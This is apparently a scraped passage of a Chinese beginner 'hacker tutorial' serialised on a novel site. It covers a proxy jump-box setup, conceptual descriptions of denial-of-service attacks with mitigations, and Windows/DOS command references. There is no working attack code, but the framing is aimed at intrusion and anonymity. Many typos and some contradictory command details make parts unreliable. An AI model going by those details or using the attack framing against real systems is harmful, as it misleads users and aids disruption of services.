  (如果不是这样就说明,还连着!)
  12:打开,snake的代理跳板GUI版,就会看到属于你自己的跳板正在替你疯狂的冲浪:)
  PS:本篇文章是本人整理tekwei的《DIYsocks5》而得,如果你还不懂可以到“tekwei的主页”下载CIH版。我的主页上有他的衔接,不好意思:)是真的不记得了,我只记得:www.tekwei.org你们试试,不行的话从我网站衔接吧:)我的网址是:topcooler.51.net,上面都是菜鸟黑客教程,欢迎广大菜鸟朋友看看:)
憂幽書盟 uUtXt.cOm 全文子扳阅读


第一卷 第六章 字数:1413
  ?DoS(拒绝服务攻击):通过使你的服务计算机崩溃或把它压跨来阻止你提供服务。简单的来说,就是让你的计算机提供可能多的服务从而使你的计算机陷入崩溃的边缘或崩溃。一般服务拒绝攻击有如下的一些常用的手法:
  1.死亡之ping
  利用许多TCP/IP实现相信ICMP包是正确组织的而且它们对这些包进行的错误校验太少的事实。通过产生畸形的、声称自己的尺寸超出可能的上限的ICMP应答请求包来传播。包的最大尺寸是65535字节,声称其尺寸大雨65500字节的包由于内存分配错误,TCP/IP实现将崩溃。
  解决办法:正确的配置操作系统与防火墙,阻断ICMP以及任何未知协议,都可以防止此类攻击。
  2.泪滴(teardrop)
  泪滴攻击利用那些在TCP/IP堆栈实现中信任IP碎片中的包的标题头所包含的信息来实现自己的攻击,也就是某些TCP/IP实现中分段重新组装进程中存在的潜在弱点被人利用。
  解决办法:服务器应用最新的服务包,或者在设置防火墙时对分段进行重组,而不是转发它们。
  3.UDP洪水(UDPflood)
  利用简单的TCP/IP服务,如CHARGEN和ECHO来传送毫无用处的占满带宽的无用数据。
  解决办法:关掉不必要的TCP/IP服务,还有就是对防火墙进行配置,阻断来自Internet的请求这些服务的UDP请求。
  4.SYN洪水(SYNflood)
  利用TCP连接机制的攻击。
  解决办法:在防火墙上过滤来自同一主机的后续连接,当然还要根据实际的情况来判断。
  5.Land攻击
  利用Land攻击时,一个特别的SYN包它的原地址和目标地址都被设置成某一个服务器地址,此举将导致接受服务器向它自己的地址发送SYN-ACK消息,结果这个地址又发回ACK消息并创建一个空连接,每一个这样的连接都将保留直到超时掉,
  解决办法:打最新的补丁。
  6.Smurf攻击
  smurf攻击通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求数据包来淹没受害主机的方式进行,最终导致该网络的所有主机都对此ICMP应答请求作出答复,导致网络阻塞。
  解决办法:去掉ICMP服务。
  7.Fraggle攻击
  Fraggle攻击对Smurf攻击作了简单的修改,使用的是UDP应答消息而非ICMP
  解决办法:滤掉UDP应答消息
  8.电子邮件炸弹
  常用的手法也是比较简单的手法,黑客通过向你的电子邮件服务器反复发送同一个大型电子邮件文件就可以淹没它。
  解决办法:对邮件地址进行适当的配置
  9.畸形消息攻击
  如果收到畸形的信息各类操作系统上的许多服务都会崩溃,由于这些服务在处理信息之前不能对他们进行适当的错误检验。
  解决办法:打最新的服务补丁。
  小结:当然还有许多的攻击方法如:体系结构刺探,DNS域转换等,我们暂时在这里就不一一列出了
优悠书萌 UUtxt.CoM 荃汶字版越渎


第一卷 第七章 字数:10013
  ?Arp:显示和修改“地址解析协议”(ARP)所使用的到以太网的IP或令牌环物理地址翻译
  表。该命令只有在安装了TCP/IP协议之后才可使用
  arp-a[inet_addr][-N[if_addr]]
  arp-dinet_addr[if_addr]
  arp-sinet_addrether_addr[if_addr]
  参数
  -a通过询问TCP/IP显示当前ARP项。如果指定了inet_addr,则只显示指定计算
  机的IP和物理地址。
  -g与-a相同。
  inet_addr以加点的十进制标记指定IP地址。
  -N显示由if_addr指定的网络界面ARP项。
  if_addr指定需要修改其地址转换表接口的IP地址(如果有的话)。如果不存在,将使用第
  一个可适用的接口。
  -d删除由inet_addr指定的项。
  -s在ARP缓存中添加项,将IP地址inet_addr和物理地址ether_addr关联。物
  理地址由以连字符分隔的6个十六进制字节给定。使用带点的十进制标记指定IP
  地址。项是永久性的,即在超时到期后项自动从缓存删除。
  ether_addr指定物理地址。
  --------------------------------------------
  Finger在运行Finger服务的指定系统上显示有关用户的信息。根据远程系统输出不同的变
  量。该命令只有在安装了TCP/IP协议之后才可用。
  finger[-l][user]@computer[...]
  参数
  -l以长列表格式显示信息。
  user指定要获得相关信息的用户。省略用户参数以显示指定计算机上所有用户的信息:
  @computer
  --------------------------------------------
  Ftp将文件传送到正在运行FTP服务的远程计算机或从正在运行FTP服务的远程计算机
  传送文件(有时称作daemon)。Ftp可以交互使用。单击“相关主题”列表中的
  “ftp命令”以获得可用的“ftp”子命令描述。该命令只有在安装了TCP/IP协议
  之后才可用。Ftp是一种服务,一旦启动,将创建在其中可以使用ftp命令的子环
  境,通过键入quit子命令可以从子环境返回到Windows2000命令提示符。当
  ftp子环境运行时,它由ftp命令提示符代表。
  ftp[-v][-n][-i][-d][-g][-s:filename][-a][-w:windowsize][computer]
  参数
  -v禁止显示远程服务器响应。
  -n禁止自动登录到初始连接。
  -i多个文件传送时关闭交互提示。
  -d启用调试、显示在客户端和服务器之间传递的所有ftp命令。
  -g禁用文件名组,它允许在本地文件和路径名中使用通配符字符(*和?)。(请参阅
  联机“命令参考”中的glob命令。)
  -s:filename指定包含ftp命令的文本文件;当ftp启动后,这些命令将自动运行。该参数中
  不允许有空格。使用该开关而不是重定向(>)。
  -a在捆绑数据连接时使用任何本地接口。
  -w:windowsize替代默认大小为4096的传送缓冲区。
  computer指定要连接到远程计算机的计算机名或IP地址。如果指定,计算机必须是行的最
  后一个参数。
  --------------------------------------------
  Nbtstat该诊断命令使用NBT(TCP/IP上的NetBIOS)显示协议统计和当前TCP/IP连
  接。该命令只有在安装了TCP/IP协议之后才可用。nbtstat[-aremotename][-AIPaddress][-c][-n][-R][-r][-S][-s][interval]
  参数
  -aremotename使用远程计算机的名称列出其名称表。
  -AIPaddress使用远程计算机的IP地址并列出名称表。
  -c给定每个名称的IP地址并列出NetBIOS名称缓存的内容。
  -n列出本地NetBIOS名称。“已注册”表明该名称已被广播(Bnode)或者WINS(其
  他节点类型)注册。
  -R清除NetBIOS名称缓存中的所有名称后,重新装入Lmhosts文件。
  -r列出Windows网络名称解析的名称解析统计。在配置使用WINS的Windows
  2000计算机上,此选项返回要通过广播或WINS来解析和注册的名称数。
  -S显示客户端和服务器会话,只通过IP地址列出远程计算机。
  -s显示客户端和服务器会话。尝试将远程计算机IP地址转换成使用主机文件的名
  称。
  interval重新显示选中的统计,在每个显示之间暂停interval秒。按CTRL+C停止重新
  显示统计信息。如果省略该参数,nbtstat打印一次当前的配置信息。
  --------------------------------------------
  Netstat显示协议统计和当前的TCP/IP网络连接。该命令只有在安装了TCP/IP协议后
  才可以使用。
  netstat[-a][-e][-n][-s][-pprotocol][-r][interval]
  参数
  -a显示所有连接和侦听端口。服务器连接通常不显示。
  -e显示以太网统计。该参数可以与-s选项结合使用。
  -n以数字格式显示地址和端口号(而不是尝试查找名称)。
  -s显示每个协议的统计。默认情况下,显示TCP、UDP、ICMP和IP的统计。-p选
  项可以用来指定默认的子集。
  -pprotocol显示由protocol指定的协议的连接;protocol可以是tcp或udp。如果与-
  s选项一同使用显示每个协议的统计,protocol可以是tcp、udp、icmp或ip。
  -r显示路由表的内容。
  interval重新显示所选的统计,在每次显示之间暂停interval秒。按CTRL+B停止重新
  显示统计。如果省略该参数,netstat将打印一次当前的配置信息。
  --------------------------------------------
  Ping验证与远程计算机的连接。该命令只有在安装了TCP/IP协议后才可以使用。
  ping[-t][-a][-ncount][-llength][-f][-ittl][-vtos][-rcount][-scount][[-jcomputer-list]|[-kcomputer-list]][-wtimeout]destination-list
  参数
  -tPing指定的计算机直到中断。-a将地址解析为计算机名。
  -ncount发送count指定的ECHO数据包数。默认值为4。
  -llength发送包含由length指定的数据量的ECHO数据包。默认为32字节;最大值是
  65,527。
  -f在数据包中发送“不要分段”标志。数据包就不会被路由上的网关分段。
  -ittl将“生存时间”字段设置为ttl指定的值。
  -vtos将“服务类型”字段设置为tos指定的值。
  -rcount在“记录路由”字段中记录传出和返回数据包的路由。count可以指定最少1台,
  最多9台计算机。
  -scount指定count指定的跃点数的时间戳。
  -jcomputer-list利用computer-list指定的计算机列表路由数据包。连续计算机可以被中
  间网关分隔(路由稀疏源)IP允许的最大数量为9。
  -kcomputer-list利用computer-list指定的计算机列表路由数据包。连续计算机不能被中
  间网关分隔(路由严格源)IP允许的最大数量为9。
  -wtimeout指定超时间隔,单位为毫秒。
  destination-list指定要ping的远程计算机。
  ------------------------------------------
  Rcp在Windows2000计算机和运行远程外壳端口监控程序rshd的系统之间复制
  件。rcp命令是一个连接命令,从Windows2000计算机发出该命令时,也可以
  用于其他传输在两台运行rshd的计算机之间复制文件。rshd端口监控程序可以
  在UNIX计算机上使用,而在Windows2000上不能使用,所以Windows2000
  计算机仅可以作为发出命令的系统参与。远程计算机必须也通过运行rshd提供
  rcp实用程序。
  rcp[-a|-b][-h][-r]source1source2...sourceNdestination
  参数
  -a指定ASCII传输模式。此模式在传出文件上将回车/换行符转换为回车符,在传
  入文件中将换行符转换为回车/换行符。该模式为默认的传输模式。-b指定二进制图像传输模式。没有执行回车/换行符转换。
  -h传输Windows2000计算机上标记为隐藏属性的源文件。如果没有该选项,在
  rcp命令行上指定隐藏文件的效果与文件不存在一样。
  -r将源的所有子目录内容递归复制到目标。source和destination都必须是目
  录,虽然即使源不是目录,使用-r也能够工作。但将没有递归。
  source和destination
  格式必须为[computer[.user]:]filename。如果忽略了[computer[.user]:]部分,计算机将假定为本地计算机。如果省略了[.user]部分,将使用当前登录的Windows2000用户名。如果使用了完全合格的计算机名,其中包含句点(.)分隔符,则必须包含[.user]。否则,计算机名的最后部分将解释为用户名。如果指定了多个源文件,则destination必须是目录。
  如果文件名不是以UNIX的正斜杠(/)或Windows2000系统的反斜杠(\)打头,则假定相对于当前的工作目录。在Windows2000中,这是发出命令的目录。在远程系统中,这是远程用户的登录目录。句点(.)表示当前的目录。在远程路径中使用转义字符(\、"或'),以便在远程计算机中使用通配符。
  -------------------------------------------
  Rexec在运行REXEC服务的远程计算机上运行命令。rexec命令在执行指定命令前,验
  证远程计算机上的用户名,只有安装了TCP/IP协议后才可以使用该命令。
  rexeccomputer[-lusername][-n]command
  参数
  computer指定要运行command的远程计算机。
  -lusername指定远程计算机上的用户名。
  -n将rexec的输入重定向到NULL。
  command指定要运行的命令。
  --------------------------------------------
  Route控制网络路由表。该命令只有在安装了TCP/IP协议后才可以使用。
  route[-f][-p][command[destination][masksubnetmask][gateway][metriccostmetric]]
  参数
  -f清除所有网关入口的路由表。如果该参数与某个命令组合使用,路由表将在运行
  命令前清除。
  -p该参数与add命令一起使用时,将使路由在系统引导程序之间持久存在。默认
  情况下,系统重新启动时不保留路由。与print命令一起使用时,显示已注册
  的持久路由列表。忽略其他所有总是影响相应持久路由的命令。
  command指定下列的一个命令。
  命令目的print打印路由
  add添加路由
  delete删除路由
  change更改现存路由
  destination指定发送command的计算机。masksubnetmask指定与该路由条目关联的子网掩码。如果没有指定,将使用
  255.255.255.255。
  gateway指定网关。
  名为Networks的网络数据库文件和名为Hosts的计算机名数据库文件中均引用全部destination或gateway使用的符号名称。如果命令是print或delete,目标和网关还可以使用通配符,也可以省略网关参数。
  metriccostmetric指派整数跃点数(从1到9999)在计算最快速、最可靠和(或)最便宜的
  路由时使用。
  ---------------------------------------------------------------------------------
  Rsh
  在运行RSH服务的远程计算机上运行命令。该命令只有在安装了TCP/IP协议后才可以使用。
  rshcomputer[-lusername][-n]command
  参数
  computer指定运行command的远程计算机。
  -lusername指定远程计算机上使用的用户名。如果省略,则使用登录的用户名。
  -n将rsh的输入重定向到NULL。
  command指定要运行的命令。
  __________________________________________________________________________________
  Tftp将文件传输到正在运行TFTP服务的远程计算机或从正在运行TFTP服务的远
  程计算机传输文件。该命令只有在安装了TCP/IP协议后才可以使用。tftp[-i]computer[get|put]source[destination]
  参数
  -i指定二进制图像传送模式(也称为“八位字节”)。在二进制图像模式中,文件一
  个字节接一个字节地逐字移动。在传送二进制文件时使用该模式。
  如果省略了-i,文件将以ASCII模式传送。这是默认的传送模式。此模式将EOL字符转换为UNIX的回车符和个人计算机的回车符/换行符。在传送文本文件时应使用此模式。如果文件传送成功,将显示数据传输率。
  computer指定本地或远程计算机。
  put将本地计算机上的文件destination传送到远程计算机上的文件source。
  get将远程计算机上的文件destination传送到本地计算机上的文件source。
  如果将本地计算机上的文件file-two传送到远程计算机上的文件file-one,请指定put。如果将远程计算机上的文件file-two传送到远程计算机上的文件file-one,请指定get。因为tftp协议不支持用户身份验证,所以用户必须登录,并且文件在远程计算机上必须可以写入。
  source指定要传送的文件。如果本地文件指定为-,则远程文件在stdout上打印出来
  (如果获取),或从stdin(如果放置)读取。
  destination指定将文件传送到的位置。如果省略了destination,将假定与source同名。
  ________________________________________________________________________________
  Tracert该诊断实用程序将包含不同生存时间(TTL)值的Internet控制消息协议
  (ICMP)回显数据包发送到目标,以决定到达目标采用的路由。要在转发数据包上
  的TTL之前至少递减1,必需路径上的每个路由器,所以TTL是有效的跃点计
  数。数据包上的TTL到达0时,路由器应该将“ICMP已超时”的消息发送回源系
  统。Tracert先发送TTL为1的回显数据包,并在随后的每次发送过程将TTL
  递增1,直到目标响应或TTL达到最大值,从而确定路由。路由通过检查中级
  路由器发送回的“ICMP已超时”的消息来确定路由。不过,有些路由器悄悄地下传
  包含过期TTL值的数据包,而tracert看不到。
  tracert[-d][-hmaximum_hops][-jcomputer-list][-wtimeout]target_name
  参数
  /d指定不将地址解析为计算机名。
  -hmaximum_hops指定搜索目标的最大跃点数。
  -jcomputer-list指定沿computer-list的稀疏源路由。
  -wtimeout每次应答等待timeout指定的微秒数。
  target_name目标计算机的名称。
憂U书盟 uUtxt.cOM 铨纹字版粤渎


第一卷 第八章 字数:9315
  ?一)MD——建立子目录
  1.功能:创建新的子目录
  2.类型:内部命令
  3.格式:MD[盘符:][路径名]〈子目录名〉
  4.使用说明:
  (1)“盘符”:指定要建立子目录的磁盘驱动器字母,若省略,则为当前驱动器;
  (2)“路径名”:要建立的子目录的上级目录名,若缺省则建在当前目录下。
  例:(1)在C盘的根目录下创建名为FOX的子目录;(2)在FOX子目录下再创建USER子目录。
  C:、>MDFOX(在当前驱动器C盘下创建子目录FOX)
  C:、>MDFOX、USER(在FOX子目录下再创建USER子目录)
  (二)CD——改变当前目录
  1.功能:显示当前目录
  2.类型:内部命令
  3.格式:CD[盘符:][路径名][子目录名]
  4.使用说明:
  (1)如果省略路径和子目录名则显示当前目录;
  (2)如采用“CD、”格式,则退回到根目录;
  (3)如采用“CD.。”格式则退回到上一级目录。
  例:(1)进入到USER子目录;(2)从USER子目录退回到子目录;(3)返回到根目录。
  C:、>CDFOX、USER(进入FOX子目录下的USER子目录)
  C:、FOX、USER>CD.。(退回上一级根目录)
  C:、FOX>CD、(返回到根目录)
  C:、>
  (三)RD——删除子目录命令
  1.功能:从指定的磁盘删除了目录。
  2.类型:内部命令
  3.格式:RD[盘符:][路径名][子目录名]
  4.使用说明:
  (1)子目录在删除前必须是空的,也就是说需要先进入该子目录,使用DEL(删除文件的命令)将其子目录下的文件删空,然后再退回到上一级目录,用RD命令删除该了目录本身;
  (2)不能删除根目录和当前目录。
  例:要求把C盘FOX子目录下的USER子目录删除,操作如下:
  第一步:先将USER子目录下的文件删空;
  C、>DELC:、FOX、USER、*。*
  第二步,删除USER子目录。
  C、>RDC:、FOX、USER
  (四)DIR——显示磁盘目录命令
  1.功能:显示磁盘目录的内容。
  2.类型:内部命令
  3.格式:DIR[盘符][路径][/P][/W]
  4.使用说明:/P的使用;当欲查看的目录太多,无法在一屏显示完屏幕会一直往上卷,不容易看清,加上/P参数后,屏幕上会分面一次显示23行的文件信息,然后暂停,并提示;Pressanykeytocontinue
  /W的使用:加上/W只显示文件名,至于文件大小及建立的日期和时间则都省略。加上参数后,每行可以显示五个文件名。
  PATH——路径设置命令
  1.功能:设备可执行文件的搜索路径,只对文件有效。
  2.类型:内部命令
  3.格式:PATH[盘符1]目录[路径名1]{[;盘符2:],〈目录路径名2〉…}
  4.使用说明:
  (1)当运行一个可执行文件时,DOS会先在当前目录中搜索该文件,若找到则运行之;若找不到该文件,则根据PATH命令所设置的路径,顺序逐条地到目录中搜索该文件;
  (2)PATH命令中的路径,若有两条以上,各路径之间以一个分号“;”隔开;
  (3)PATH命令有三种使用方法:
  PATH[盘符1:][路径1][盘符2:][路径2]…(设定可执行文件的搜索路径)
  PATH:(取消所有路径)
  PATH:(显示目前所设的路径)
  (六)TREE——显示磁盘目录结构命令
  1.功能:显示指定驱动器上所有目录路径和这些目录下的所有文件名。
  2.类型:外部命令
  3.格式:TREE[盘符:][/F][》PRN]
  4.使用说明:
  (1)使用/F参数时显示所有目录及目录下的所有文件,省略时,只显示目录,不显示目录下的文件;
  (2)选用>PRN参数时,则把所列目录及目录中的文件名打印输出。
  (七)DELTREE——删除整个目录命令
  1.功能:将整个目录及其下属子目录和文件删除。
  2.类型:外部命令
  3.格式:DELTREE[盘符:]〈路径名〉
  4.使用说明:该命令可以一步就将目录及其下的所有文件、子目录、更下层的子目录一并删除,而且不管文件的属性为隐藏、系统或只读,只要该文件位于删除的目录之下,DELTREE都一视同仁,照删不误。使用时务必小心!!!
  五、磁盘操作类命令
  (一)FORMAT——磁盘格式化命令
  1.功能:对磁盘进行格式化,划分磁道和扇区;同时检查出整个磁盘上有无带缺陷的磁道,对坏道加注标记;建立目录区和文件分配表,使磁盘作好接收DOS的准备。
  2.类型:外部命令
  3.格式:FORMAT〈盘符:〉[/S][/4][/Q]
  4.使用说明:
  (1)命令后的盘符不可缺省,若对硬盘进行格式化,则会如下列提示:WARNING:ALLDATAONNON——REMOVABLEDISK
  DRIVEC:WILLBELOST!
  ProceedwithFormat(Y/N)?
  (警告:所有数据在C盘上,将会丢失,确实要继续格式化吗?)
  (2)若是对软盘进行格式化,则会如下提示:InsertmewdiskettefordriveA;
  andpressENTERwhenready…
  (在A驱中插入新盘,准备好后按回车键)。
  (3)选用[/S]参数,将把DOS系统文件IO.SYS、MSDOS.SYS及COMMAND.COM复制到磁盘上,使该磁盘可以做为DOS启动盘。若不选用/S参数,则格式化后的磙盘只能读写信息,而不能做为启动盘;
  (4)选用[/4]参数,在1.2MB的高密度软驱中格式化360KB的低密度盘;
  (5)选用[/Q]参数,快速格式化,这个参数并不会重新划分磁盘的磁道貌岸然和扇区,只能将磁盘根目录、文件分配表以及引导扇区清成空白,因此,格式化的速度较快。
  (6)选用[/U]参数,表示无条件格式化,即破坏原来磁盘上所有数据。不加/U,则为安全格式化,这时先建立一个镜象文件保存原来的FAT表和根目录,必要时可用UNFORRMAT恢复原来的数据。
  (二)UNFORMAT恢复格式化命令
  1.功能:对进行过格式化误操作丢失数据的磁盘进行恢复。
  2.类型:外部命令
  3.格式:UNFORMAT〈盘符〉[/L][/U][/P][/TEST]
  4.使用说明:用于将被“非破坏性”格式化的磁盘恢复。根目录下被删除的文件或子目录及磁盘的系统扇区(包括FAT、根目录、BOOT扇区及硬盘分区表)受损时,也可以用UNFORMAT来抢救。
  (1)选用/L参数列出找到的子目录名称、文件名称、大孝日期等信息,但不会真的做FORMAT工作。
  (2)选用/P参数将显示于屏幕的报告(包含/L参数所产生的信息)同时也送到打印机。运行时屏幕会显示:“PrintoutwillbesenttoLPT1”
  (3)选用/TEST参数只做模拟试验(TEST)不做真正的写入动作。使用此参数屏幕会显示:“Simulationonly”
  (4)选用/U参数不使用MIRROR映像文件的数据,直接根据磁盘现状进行UNFORMAT。
  (5)选用/PSRTN;修复硬盘分区表。
  若在盘符之后加上/P、/L、/TEST之一,都相当于使用了/U参数,UNFORMAT会“假设”此时磁盘没有MIRROR映像文件。
  注意:UNFORMAT对于刚FORMAT的磁盘,可以完全恢复,但FORMAT后若做了其它数据的写入,则UNFORMAT就不能完整的救回数据了。UNFORMAT并非是万能的,由于使用UNFORMAT会重建FAT与根目录,所以它也具有较高的危险性,操作不当可能会扩大损失,如果仅误删了几个文件或子目录,只需要利用UNDELETE就够了。
  三)CHKDSK——检查磁盘当前状态命令
  1.功能:显示磁盘状态、内存状态和指定路径下指定文件的不连续数目。
  2.类型:外部命令
  3.格式:CHKDSK[盘符:][路径][文件名][/F][/V]
  4.使用说明:
  (1)选用[文件名]参数,则显示该文件占用磁盘的情况;
  (2)选[/F]参数,纠正在指定磁盘上发现的逻辑错误;
  (3)选用[/V]参数,显示盘上的所有文件和路径。
  (四)DISKCOPY——整盘复制命令
  1.功能:复制格式和内容完全相同的软盘。
  2.类型:外部命令
  3.格式:DISKCOPY[盘符1:][盘符2:]
  4.使用说明:
  (1)如果目标软盘没有格式化,则复制时系统自动选进行格式化。
  (2)如果目标软盘上原有文件,则复制后将全部丢失。
  (3)如果是单驱动器复制,系统会提示适时更换源盘和目标盘,请操作时注意分清源盘和目标盘。
  (五)LABEL——建立磁盘卷标命令
  1.功能:建立、更改、删除磁盘卷标。
  2.类型:外部命令
  3.格式:LABEL[盘符:][卷标名]
  4.使用说明:
  (1)卷标名为要建立的卷标名,若缺省此参数,则系统提示键入卷标名或询问是否删除原有的卷标名;
  (2)卷标名由1至11个字符组成。
  (六)VOL——显示磁盘卷标命令
  1.功能:查看磁盘卷标号。
  2.类型:内部命令
  3.格式:VOL[盘符:]
  4.使用说明:省略盘符,显示当前驱动器卷标。
  (七)SCANDISK——检测、修复磁盘命令
  1.功能:检测磁盘的FAT表、目录结构、文件系统等是否有问题,并可将检测出的问题加以修复。
  2.类型:外部命令
  3.格式:SCANDISK[盘符1:]{[盘符2:]…}[/ALL]
  4.使用说明:
  (1)CCANDISK适用于硬盘和软盘,可以一次指定多个磁盘或选用[/ALL]参数指定所有的磁盘;
  (2)可自动检测出磁盘中所发生的交叉连接、丢失簇和目录结构等逻辑上的错误,并加以修复。
  (八)DEFRAG——重整磁盘命令
  1.。功能:整理磁盘,消除磁盘碎块。
  2.类型:外部命令
  3.格式:DEFRAG[盘符:][/F]
  4.使用说明:选用/F参数,将文件中存在盘上的碎片消除,并调整磁盘文件的安排,确保文件之间毫无空隙。从而加快读盘速度和节省磁盘空间。
  (九)SYS——系统复制命令
  1.功能:将当前驱动器上的DOS系统文件IO.SYS,MSDOS.SYS和COMMAND.COM传送到指定的驱动器上。
  2.类型:外部命令
  3.格式:SYS[盘符:]
  *使用说明:如果磁盘剩余空间不足以存放系统文件,则提示:Noroomforondestinationdisk.
  文件操作类命令
  (一)COPY文件复制命令
  1.功能:拷贝一个或多个文件到指定盘上。
  2.类型:内部命令
  3.格式:COPY[源盘][路径]〈源文件名〉[目标盘][路径][目标文件名]
  4.使用说明:
  (1)COPY是文件对文件的方式复制数据,复制前目标盘必须已经格式化;
  (2)复制过程中,目标盘上相同文件名称的旧文件会被源文件取代;
  (3)复制文件时,必须先确定目标般有足够的空间,否则会出现;insufficient的错误信息,提示磁盘空间不够;
  (4)文件名中允许使用通配举“*”“?”,可同时复制多个文件;
  (5)COPY命令中源文件名必须指出,不可以省略。
  (6)复制时,目标文件名可以与源文件名相同,称作“同名拷贝”此时目标文件名可以省略;
  (7)复制时,目标文件名也可以与源文件名不相同,称作“异名拷贝”,此时,目标文件名不能省略;
  (8)复制时,还可以将几个文件合并为一个文件,称为“合并拷贝”,格式如下:COPY;[源盘][路径]〈源文件名1〉〈源文件名2〉…[目标盘][路径]〈目标文件名〉;
  (9)利用COPY命令,还可以从键盘上输入数据建立文件,格式如下:COPYCON[盘符:][路径]〈文件名〉;
  (10)注意:COPY命令的使用格式,源文件名与目标文件名之间必须有空格!
  (二)XCOPY——目录复制命令
  1.功能:复制指定的目录和目录下的所有文件连同目录结构。
  2.类型:外部命令
  3.格式:XCOPY[源盘:]〈源路径名〉[目标盘符:][目标路径名][/S][/V][/E]
  4.使用说明:
  (1)XCOPY是COPY的扩展,可以把指定的目录连文件和目录结构一并拷贝,但不能拷贝隐藏文件和系统文件;
  (2)使用时源盘符、源目标路径名、源文件名至少指定一个;
  (3)选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数,否则/S不会拷贝空目录,若不指定/S参数,则XCOPY只拷贝源目录本身的文件,而不涉及其下的子目录;
  (4)选用/V参数时,对的拷贝的扇区都进行较验,但速度会降低。
  (三)TYPE——显示文件内容命令
  1.功能:显示ASCII码文件的内容。
  2.类型:内部命令。
  3.格式:TYPE[盘符:][路径]〈文件名〉
  4.使用说明:
  (1)显示由ASCII码组成的文本文件,对。EXE.COM等为扩展名的文件,其显示的内容是无法阅读的,没有实际意义2;
  (2)该命令一次只可以显示一个文件的内容,不能使用通配符;
  (3)如果文件有扩展名,则必须将扩展名写上;
  (4)当文件较长,一屏显示不下时,可以按以下格式显示;TYPE[盘符:][路径]〈文件名〉|MORE,MORE为分屏显示命令,使用些参数后当满屏时会暂停,按任意键会继续显示。
  (5)若需将文件内容打印出来,可用如下格式:
  TYPE[盘符:][路径]〈文件名〉,>PRN
  此时,打印机应处于联机状态。
  (四)REN——文件改名命令
  1.功能:更改文件名称
  2.类型:内部命令
  3.格式:REN[盘符:][路径]〈旧文件名〉〈新文件名〉
  4.使用说明:
  (1)新文件名前不可以加上盘符和路径,因为该命令只能对同一盘上的文件更换文件名;
  (2)允许使用通配符更改一组文件名或扩展名。
  (五)FC——文件比较命令
  1.功能:比较文件的异同,并列出差异处。
  2.类型:外部命令
  3.格式:FC[盘符:][路径名]〈文件名〉[盘符:][路径名][文件名][/A][/B][/C][/N]
  4.使用说明:
  (1)选用/A参数,为ASCII码比较模式;
  (2)选用/B参数,为二进制比较模式;
  (3)选用/C参数,将大小写字符看成是相同的字符。
  (4)选用/N参数,在ASCII码比较方式下,显示相异处的行号。
  (六)ATTRIB——修改文件属性命令
  1.功能:修改指定文件的属性。(文件属性参见2.5.4(二)文件属性一节)
  2.类型:外部命令。
  3.格式:ATTRIB[文件名][R][——R][A][——A][H][——H][S][——S][/S]
  4.使用说明:
  (1)选用R参数,将指定文件设为只读属性,使得该文件只能读取,无法写入数据或删除;选用——R参数,去除只读属性;
  (2)选用A参数,将文件设置为档案属性;选用——A参数,去除档案属性;
  (3)选用H参数,将文件调协为隐含属性;选用——H参数,去隐含属性;
  (4)选用S参数,将文件设置为系统属性;选用——S参数,去除系统属性;
  (5)选用/S参数,对当前目录下的所有子目录及作设置。
  七)DEL——删除文件命令
  1.功能:删除指定的文件。
  2.类型:内部命令
  3.格式:DEL[盘符:][路径]〈文件名〉[/P]
  4.使用说明:
  (1)选用/P参数,系统在删除前询问是否真要删除该文件,若不使用这个参数,则自动删除;
  (2)该命令不能删除属性为隐含或只读的文件;
  (3)在文件名称中可以使用通配符;
  (4)若要删除磁盘上的所有文件(DEL*·*或DEL·),则会提示:(Areyousure?)(你确定吗?)若回答Y,则进行删除,回答N,则取消此次删除作业。
  (八)UNDELETE——恢复删除命令
  1.功能:恢复被误删除命令
  2.类型:外部命令。
  3.格式:UNDELETE[盘符:][路径名]〈文件名〉[/DOS]/LIST][/ALL]
  4.使用说明:使用UNDELETE可以使用“*”和“?”通配符。
  (1)选用/DOS参数根据目录里残留的记录来恢复文件。由于文件被删除时,目录所记载斩文件名第一个字符会被改为E5,DOS即依据文件开头的E5和其后续的字符来找到欲恢复的文件,所以,UNDELETE会要求用户输入一个字符,以便将文件名字补齐。但此字符不必和原来的一样,只需符合DOS的文件名规则即可。
  (2)选用/LIST只“列出”符合指定条件的文件而不做恢复,所以对磁盘内容完全不会有影响。
  (3)选用/ALL自动将可完全恢复的文件完全恢复,而不一一地询问用户,使用此参数时,若UNDELTE利用目录里残留的记录来将文件恢复,则会自动选一个字符将文件名补齐,并且使其不与现存文件名相同,选用字符的优选顺序为:#%——0000123456789A~Z。
  UNDELETE还具有建立文件的防护措施的功能,已超出本课程授课范围,请读者在使用些功能时查阅有关DOS手册。
  七、其它命令
  (一)CLS——清屏幕命令
  1功能:清除屏幕上的所有显示,光标置于屏幕左上角。
  2类型:内部命令
  3格式:CLS
  (二)VER查看系统版本号命令
  1功能:显示当前系统版本号
  2类型:内部命令
  3格式:VER
  (三)DATA日期设置命令
  1功能:设置或显示系统日期。
  2类型:内部命令
  3格式:DATE[mm——dd——yy]
  4使用说明:
  (1)省略[mm——dd——yy]显示系统日期并提示输入新的日期,不修改则可直接按回车键,[mm——dd——yy]为“月月——日日——年年”格式;
  (2)当机器开始启动时,有自动处理文件(AUTOEXEC.BAT)被执行,则系统不提示输入系统日期。否则,提示输入新日期和时间。
  (四)TIME系统时钟设置命令
  1功能:设置或显示系统时期。
  2类型:内部命令
  3格式:TIME[hh:mm:ss:xx]
  4使用说明:
  (1)省略[hh:mm:ss:xx],显示系统时间并提示输入新的时间,不修改则可直接按回车键,[hh:mm:ss:xx]为“小时:分钟:秒:百分之几秒”格式;
  (2)当机器开始启动时,有自动处理文件(AUTOEXEC.BAT)被执行,则系统不提示输入系统日期。否则,提示输入新日期和时间。
  (五)MEM查看当前内存状况命令
  1功能:显示当前内存使用的情况
  2类型:外部命令
  3格式:MEM[/C][/F][/M][/P]
  4使用说明:
  (1)选用/C参数列出装入常规内存和CMB的各文件的长度,同时也显示内存空间的使用状况和最大的可用空间;
  (2)选用/F参数分别列出当前常规内存剩余的字节大小和UMB可用的区域及大小;
  (3)选用/M参数显示该模块使用内存地地址、大小及模块性质;
  (4)选用/P参数指定当输出超过一屏时,暂停供用户查看。
  (六)MSD显示系统信息命令
  1功能:显示系统的硬件和操作系统的状况。
  2类型:外部命令
  3格式:MSD[/I][/B][/S]
  4使用说明:
  (1)选用/I参数时,不检测硬件;
  (2)选用/B参数时,以黑白方式启动MSD;
  (3)选用/S参数时,显示出简明的系统报告。
Uu書擝 UutXt。COM 铨蚊吇坂粤渎


第一卷 第九章 字数:4894
  ?ftp的命令行格式为:ftp-v-d-i-n-g[主机名]
